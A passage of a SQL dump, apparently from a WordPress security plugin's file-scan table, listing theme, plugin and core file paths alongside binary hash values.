��r����\r7C�H��G+���','',0,'?'),('lZ�q�#eS%s��7Y�','wp-includes/js/dist/notices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����,s\Z���`a','e}��䁸7Y|E:E�ڧ�;�m�*cZ��v�Q\r�','',0,'?'),('l`Pq��v�x\n�ň�#','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/lint/html-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n=tF�1���C&\Z�','o�-�Ei�� *�pF�`�I����g��q��)�.','',0,'?'),('lk�3I�*��ǫD�','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�u���m�F�p���','��d���}��;�9T���$��\'tEj�(]','',0,'?'),('lryto�T��Ql �','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/comment-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���������y�','�kl��XOQwºILE)�#b�M}3y��m�','',0,'?'),('lt����\0�J����','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x��I�5؋M\Z��*','co�4�2�&�ߓl*�)6����S� �5��⊽4','',0,'?'),('l��b�Ɍ�r^z�#','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xݮ�<�N\0.�ܰ��x','#C����?�=�Z�\\N-ev�\Z��w�GU!J��\Z','',0,'?'),('l��N�9��.�`��A','wp-content/themes/city-store/inc/widgets/widgets-functions/register-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�\r�.\0U��sS','�/l/ݙ}�~pq�Q��TF��JH��GU\0��','',0,'?'),('l�E6C����E4��','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/css/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��+�س����\r]%','8�b���?��S1�\Z-$�0�Dsh��8q1�gu','',0,'?'),('m��p̑�BB�m��k','wp-content/themes/university-hub/third-party/sidr/css/jquery.sidr.dark.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6X���E+�6��o��q','	�&�*�pu%@��bB$���*QL9��1*Vw_�\r','',0,'?'),('m1-\'ۜ؆�M�-�','wp-content/themes/enigma/images/3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�l���O:�̤�`�!','��v��������p�&��/z�w>���F�)','',0,'?'),('mD��T�ms���A�}','wp-includes/certificates/ca-bundle.crt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M��T�[чB��','�����aP����P\0�v?6,�̟An���','',0,'?'),('m��\Z\"�6��-��','wp-content/themes/graduate/tp-education/tp-archive-affiliation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��(fZX�D���','��k*�3��^[����M&���L�XT�','',0,'?'),('m��3���.�ȵ[�','wp-content/themes/Kent/inc/template-tags.php',0,'e�+]쵒ڢ����S9','e�+]쵒ڢ����S9','�v��0lF8�Ge�d�Y�6Sji�����A','',0,'?'),('m&i4玒SلE�7Z[','wp-content/themes/the-best/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;(H��-Jht�x�','��;�m��}������e(~�y0m�=�},','',0,'?'),('m>����i��~qus','wp-content/themes/wp-simple/inc/kirki/assets/images/kirki-bottom.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����v�}��^��','�%\Z�\"S��/k��������������Q�','',0,'?'),('mA�p��	1��G�U/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�׋�Po�v��`�','�Zu�E-�-߈��������S�C��di5$r','',0,'?'),('mA��Y����Rb|�S�','wp-includes/ms-default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�%�M�A�b���Y�','_%������ ��+�g��`���}<���','',0,'?'),('mE���\\�)��o�','wp-includes/js/jquery/ui/spinner.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�������<8z�+','�5��bW���O��h���_�_��� I��','',0,'?'),('mI��yM�9�U��rE�','wp-content/themes/newsmag/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C\0Ű�X�<9�','��#x�h�D�V{^����-��ر	Y=���','',0,'?'),('mR���I�)3g	��R','wp-content/themes/brickyard/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�\'0Kq�r�a�z7\Z','A��w(ĺ0�w��w��s%X�\ZUDU��._�p!','',0,'?'),('mY����}ɽ��?','wp-includes/js/jquery/jquery.ui.touch-punch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('mx�&L�KQ�M���','wp-content/plugins/wp-cerber/assets/flags/va.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','od�ل�0Bߵ�߽s','�[•=�px	��LE�^�4|��~30yx\Z�&�','',0,'?'),('m�f��6Y�|�m2��','wp-content/themes/graphene/admin/options-colours.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�8�~��!Ig','��.!�1~rb�����f@?;2��!Hy��J�\"\\','',0,'?'),('m��-\Zm1����w��','wp-includes/js/jquery/ui/sortable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��:�7)�r�ӈ�k',')��jjc�D�߰�%^B���� �&�ٶ�Ƀ�','',0,'?'),('m�y�z̗�܊�W�M','wp-content/plugins/all-in-one-wp-security-and-firewall/css/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('m� &Gh8-�0V��ED','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/fold/indent-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�ӈ�72q���','�2{�˒	�/y��ת��0���\'��-$','',0,'?'),('m���x�^�O�� ','wp-content/themes/auberge/includes/tgmpa/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:x7e�]a�p��4�','5 ��d���s��MkKQt��چ�&vk�o�','',0,'?'),('m���I�:׃@au,]','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z,624w�_&�','��a�.h�\0�� ��{Q���û�in&T�T��','',0,'?'),('mΩ�%�L���AJ','wp-content/themes/education-hub/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�=Vq&��η�1�','15�*�����.��:����^�P{v�~] \'','',0,'?'),('m�tx��n\'��4,�','wp-content/themes/advance/css/customcss/mobile_sidebar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R;���6pe��ۈE�','k]��e��+����KDѕ��;7�wR�`e�q','',0,'?'),('m�{�s��7]yR�Kb�','wp-content/themes/catch-flames/js/jquery.cycle/jquery.cycle2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-f�#�$�3��^','�{5����o���\nxeU�?��17��M���','',0,'?'),('m؜�8s1����#�>7[','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$������Bi�B�5j','L�@$�bK��ަX���/R|^��su��:�B','',0,'?'),('m��I.E~p�s�','wp-content/plugins/wp-cerber/assets/flags/gb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o;T��+<��&�','�=�޺��\Z���PͿ���\\ȝ�F�_���\\�','',0,'?'),('m�b2�����†�uk','wp-content/themes/education-hub/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ί�|Bn��)�p���','�9�f�\0,\0㣿%��9����U\"X�t&s.5 js','',0,'?'),('m�����_q�	��','wp-content/themes/brickyard/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�w��\rvst��l2�','�{�q*�<�S��H�\"�ٹ^	$��X\0�a3q','',0,'?'),('m�`˳�qe\'��L','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/php/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H:a�\n�Y�\rys���4','���r�8���_�	S}�>:5\"S���_','',0,'?'),('m�$1�7\r��?�:<i','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/javascript/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;5O���y\r��;��Q','?�+�@���0�8w�lW���mz<�%0���','',0,'?'),('nQ��ʒ\'�k��\"%�','wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=�	���Tc�vL\n*Ȱ','',0,'?'),('n�hÄ���X�FlM�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/comment/continuecomment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�Rՠ�}�C���W%','�h�aZM��r��/ˈ�r=�`��4��B�@','',0,'?'),('n?����PE�O��W#','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-select2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�_K�ә^���S','u\0yUM���ɪ���vU�Y`�I�A5xa�vN@','',0,'?'),('n]�j7<3ISsQ�','wp-admin/images/post-formats32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t.E���5G�N\Z�v','(Z�,���Im�Y,·�ԗ��tG��������a','',0,'?'),('n[	X���}�0�','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%ؘ5��a�O�_��','�3½}�߈�6��-������x%�uv�','',0,'?'),('n�R��mW.�mx','wp-content/themes/gambit/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H	H5ȍ��JN��Gt�','����=	�9�=)��1�ԃ�\nٝw#+','',0,'?'),('n�R��)l�}�E�5-','wp-content/themes/advance/inc/kirki/assets/scss/controls/multicheck.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�g/W�5���+�r','��CSe��yC:ү|��۩J4�$�Ji�w!\0(c','',0,'?'),('n#�t=�\'����b]{�','wp-includes/js/tinymce/themes/modern/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���E��|�h(Zf�','ӣ	}�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('n-}��M4󛮤\nZm','wp-content/themes/weblog/acmethemes/customizer/footer-section/footer-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%��\'Z�d�tڶ�','��).!tV&]7Yî׌�ϐ�Q�^W}�=�#j','',0,'?'),('n.�@��:[����','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jj��/^?��22���$','�3�l���?�2�!��\"0��{�Ԃ�Ϊ|�','',0,'?'),('n;>]�/�\'�l1�x2�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/colorforth.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1۱��[�~u��','�6@����a�����J[�\n_b�M�','',0,'?'),('nAj+�u��VG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AT)T	��<˹o��','����}��\Z�dv�C��lC\\�{�{�4&[�','',0,'?'),('nJ��ɡsԊ��}5mB','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/dashicons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r/\Z�5��S������','�G��\"�]icsҺ���҂�ڒ�(���','',0,'?'),('nMh�n�V4X��[��','wp-content/themes/enigma/images/Search-Engine-Optimizer-new.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%����U�t���	F`�','`a�a�_\\��HBXz�R	g�u�f�','',0,'?'),('nOB��ƽ6�0ʎ9��=','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��eEo�������3','\0Q�}����m�P��{���#�D�R���','',0,'?'),('nU�N�Q6�H�k�','wp-content/plugins/wp-cerber/assets/flags/sx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('nZ/1T:{&^�/n���','wp-admin/js/media-gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_8��5o�?�','Ƥ�$�30��I��X��C,b���\"0l�N�F','',0,'?'),('ng���H��d��b','wp-content/themes/simpleshift/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D����ëvje]�e{','���d�K���8�ϩ��ƙ�_�U���m��mo','',0,'?'),('nl�:�b�oa��e��Ze','wp-content/themes/edge/js/color-scheme-control.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~W3��<.݁�����','��6P��s���,dQ��C�����\0D�D��','',0,'?'),('no�8W�%�u�\n�5','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/link-icons/icons/im.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��87N ��]���','�W���t�`c�ʕoAR㞶�C��J=��d','',0,'?'),('n|J��	�Uϛ��l','wp-content/themes/Endolf/FT/plugin/options-framework/options-framework.php',0,'\"F�W�/��鱌7zl','\"F�W�/��鱌7zl','d���Q�:�g�l��Ntp�/1�D��>ā�','',0,'?'),('n�T��+�M;[��@�{2','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/javascript-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����fN?����g%d�','rE��Y�^�K`��&�N�w�,���W��','',0,'?'),('n��~4��P��4T��','wp-content/themes/catch-responsive/js/catchresponsive-custom-scripts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ğ�\'Ύ��b�3���v','���`��K�o��W��(�NS��(	���o','',0,'?'),('n����@��A��F�','wp-admin/network/sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�m�2\Z�.P���','�pA�V��O����i2E�ck�F]Y$SQ�Sl','',0,'?'),('n��d�������+3','wp-content/themes/lovecraft/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zhڌ�K.�{�\nz\"�','�졆>�e�?*�H���eH��Q���O�','',0,'?'),('n��)+��&=!��-E�','wp-content/themes/Endolf/js/jquery.flexslider.js',0,'j�(C���]sa�','j�(C���]sa�','S�Y�Xr����T=	�:s��x��?0�b�����','',0,'?'),('n�-�U�Mo�f�.�&0�','wp-content/themes/advance/js/unminified/modernizr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�BY%\0ѡ��	�','”1U�2��zkI�EcjF��f:[�=�U�f�','',0,'?'),('n��M}؄��Oljm̱','wp-content/themes/graduate/inc/widgets/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0:k!VM�k�V�\n','�rd\ZqK�mG�,��{�쥤���8���+�P','',0,'?'),('n�^�,F*&T�{�DF','wp-content/themes/monograph/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�Bd��9[�{��','�7\0�H%橼<d��0�h.\\�۶ij','',0,'?'),('n���熰�ebWO�u','wp-content/plugins/wordfence/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('n����AZ��sw�=2','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-sortable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9i���Ư���','�?��O�e�}�z���dnU��W�C4vl��~','',0,'?'),('nŢ�)�c���q^\"','wp-includes/Requests/Exception/HTTP/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�RaßC�`\0�UT�','�}��=3x�A9����l��p\0�ư�9e.O','',0,'?'),('n�e�����;����<','wp-content/themes/twentytwentyone/assets/sass/style-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���Yp;:���N�','uL;�ީݒ<�sby\r7J�V����5[*ZzK��','',0,'?'),('n��Z���2�W[��}e','wp-content/themes/chronus/template-parts/featured/featured-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2FF�K��1�w�','�̇�~�Q���+�v\0��8�Gb�b�V\Z�h�r','',0,'?'),('n�(T8PpDg!K�Qp�','wp-content/themes/graphene/admin/ajax-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�߇X�ݪ��ZG��%','�ͦG��\'�Y�~AT�h�iOE�','',0,'?'),('n�m�;�����k�[t','wp-content/themes/university-hub/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H�D�9~�','��qI�E�-\n�� �^��Xhܯ���ٯC�','',0,'?'),('n�к���v�nj=ͮ','wp-admin/includes/class-bulk-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6/M�<ϋ��vk5','�s�q�<��$�wt���Ҫ�kԇ6�KL�','',0,'?'),('n��o�����y���','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�����_�\n\Zt','>��M�,��A���a���k��\0�m,�D��','',0,'?'),('n,�Q���3b��O','wp-includes/js/dist/warning.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Kn����/���=�','�v�Q�m�����	�S-��#Qf��7�l3h}|','',0,'?'),('n���0�9j�v8�\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׭_�s?8f,ؔa��','��ۂ5سq\'ԟ*�.F�Č�կ�ͻ�+\rSI�','',0,'?'),('n���N��?p�̡\0','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bz.�?4i�B����','G�M\"R��W.`�x������֎.�Q�\\��i�K','',0,'?'),('n��\0�]@�w��xy�','wp-content/themes/catch-responsive/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��~����/�<@fw','�	9P%<����R��be�z-�~	}޼f+�w ','',0,'?'),('n��kup=y8�H�\'�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/javascript/javascript.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m;�KG����K��','r\Z�Q���Ϙ	��8���J��a{�>Z`�xG9','',0,'?'),('n��ۗ��vXH)�','wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('o�\"���P�i?Y:ć','wp-content/themes/hitmag/inc/kirki/assets/js/branding.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�迾��IBꪼg','�\06z=�a����\\��(���GmTꥪ7SQ','',0,'?'),('o\rr1ȇ7��y�s��','wp-content/themes/wp-simple/inc/kirki/includes/scripts/class-kirki-scripts-loading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':^��֓��!B��m�','��P�(�Y`���A�[b�v�z>з3w\n','',0,'?'),('o\r�T��T��u(l','wp-content/themes/advance/layout/part-layout1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'xB��3h�ɇ�	V1E:','�\"�+��^�)�yPŜJ�`|7�Ŷ�ڂ_','',0,'?'),('o!�%��\"�#`ŵ1','wp-content/themes/chronus/inc/customizer/sanitize-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I4K]�Oٌcg\\���&�','��q����>h�f@]�J\n��p��zʔ��m�','',0,'?'),('o$�qEp��S\03xГ','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/edit/matchtags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TQ\'���]w�����uŶ','��`��N	��ն�bxSO �~�9Ͷ\n�B�2','',0,'?'),('o$������#��=�','wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n#�Q���|J����','~�[��X�@x�@\'�̂2%�\Z0�q�� 9����','',0,'?'),('o\'RD-��\0���o��','wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cl�$��r����n<.','��$�M��Ԯ�&���(ᩘs��^	Ϣ*N��','',0,'?'),('o,}x�/��,��H�{V','wp-content/themes/newsmag/assets/sass/site/primary/_asides.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U=6�q�\0B�<��]','@֩$.�D��M�(t�B\'ن�&\0���K��','',0,'?'),('o1i�L5���z�$��7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u1��\\�8���;#j-','P����|�l�_���Z��3z<NɧK���','',0,'?'),('oC�\"���Q���t��y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�����%','�4!��H�:�6>�lE��Ec#���a{�A�{','',0,'?'),('oI��%���?��2���','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/hint/javascript-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����fN?����g%d�','rE��Y�^�K`��&�N�w�,���W��','',0,'?'),('oP�c����o�.�r','wp-includes/js/tinymce/skins/lightgray/img/object.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('oS]�~(��7;�\r�','wp-includes/js/dist/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʼ�����|���U','��9j�Z�-�T�(�(�kC�����r�uS�','',0,'?'),('oZ0�������<c�0','wp-includes/SimplePie/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),('om���Mg�����&','wp-content/themes/enigma/images/Guardian.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�#��O�|!��,\\�','�ϻs�K`�\r�<�JK���9��N���\Z','',0,'?'),('on�dX���%��l','wp-content/themes/event/wpml-config.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}u���Y[�+I�','�\'^���5��9K\Z�|pA&O�4ʲ���6š','',0,'?'),('o}�C܊8�E��G�','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rW�+�`Akæ�V r','U���mְ�E2�e�Io�#�z^aŁ���$G�','',0,'?'),('o��~�6D�%�\0;R#','wp-content/themes/wp-simple/assets/images/b8b8b8.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B{�j�\0S����','�@�ŦB�O|3�iΟ�3�-�긄(<Ջ��_��','',0,'?'),('o����òco\n���d','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/php/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�A&�G�o#\"����Q','D�T`�O\nq��m�HZm �ό1���','',0,'?'),('o��x��m�($��,=','wp-content/themes/newsmag/assets/sass/modules/_infinite-scroll.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������/8 �5\r�','��-�i�����QAK�Va�T(�\r�\\u~��U�','',0,'?'),('o���~����$�(','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/haml/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԝq>g�N���Wu�','��q�4\'�o���i1\0ܱ.�&��@�@��M	|','',0,'?'),('o�j̄��C-#|E�','wp-content/plugins/wp-cerber/assets/flags/ag.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g(4e���j52^G','��2�M�`O���?iX�e�B�q����x��','',0,'?'),('o��Z)\'�žȒ)�M','wp-content/themes/chronus/inc/featured-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�\"��ץT7]f���','�b:�tw&px��/y+�W��Xu�:-�\Z�J�G','',0,'?'),('o��b� �n|�b9��\"','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/coffeescript-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�\Z�KC	 k�q�ޟ�','c����[\"Wc�c�ł�?��av����','',0,'?'),('o��i�����)�ۢq','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L+��r�E�j���(?','��M������;2h�%�~�!_�myt��;b','',0,'?'),('o�w*�\nΛ΢GҜ�]','wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('o���߆�0�y־��g','wp-content/themes/advance/css/advance_widgets_custom_css.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Wʔ�a,�l\\(���','.x��F�iC sVR�����ҶM-p�O��','',0,'?'),('o��ⴍ�J\"}��y��','wp-content/themes/edge/page-templates/contact-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϣn��\Z��x�r�','H�I����ZRvf����6k��Q��r�ւ#��m','',0,'?'),('o�絃�~�Gx�Xx\0��','wp-content/themes/simpleshift/inc/kirki/assets/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��g�c���e#�QF�','�S��;*R\Z\'z�Q���_]D��g�]���539\'�%','',0,'?'),('o㮚-�;?X:��pҡ','wp-trackback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ьWe=]!B��','��\'ߵ���3�M؞Ø��5���c�o�M�U�%','',0,'?'),('o���Y��څ��X�','wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7� ��(�˿!�\Z7�','Bx�0%Ly�6���!��X\\z/<�n�6=\ZW�','',0,'?'),('o�[��n3u��ʹ�P5','wp-admin/options-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O+�٢���%ڦS�','Y�*7:��!ȡ˦�Ak}���w��2��Z1','',0,'?'),('o���˺�Ae�&���)','wp-content/themes/hitmag/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']m���n8C\"��&��5',']\"TO���92Y��ˬ\\2��k��\" L٦�','',0,'?'),('o� �c(]�\r]�C��','wp-content/themes/graphene/images/social/newsvine.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e!�Zn���SB����','\"��7��E����*oau9Im�Sȥ�p�Av�','',0,'?'),('p��7u�L�_{2Û�','wp-includes/js/jquery/ui/draggable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���\\O��Љ/�Hp%','�N��B\0�!8\r���o? �)E�C>��','',0,'?'),('pD��ߚO��.����','wp-content/themes/edge/inc/upgrade-plus/class-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0a~���r�z8lm�L','�X�T�\n���9gTwśk\n��LHI��2W�','',0,'?'),('p���;��s���','wp-content/themes/catch-responsive/inc/customizer-includes/catchresponsive-customizer-social-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�܄vۥ���V�l�','NJS8qV�)\0yV��ƴ�����q+�\0!g�=`','',0,'?'),('p�?وU���\0˜','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�}�$c�{G�(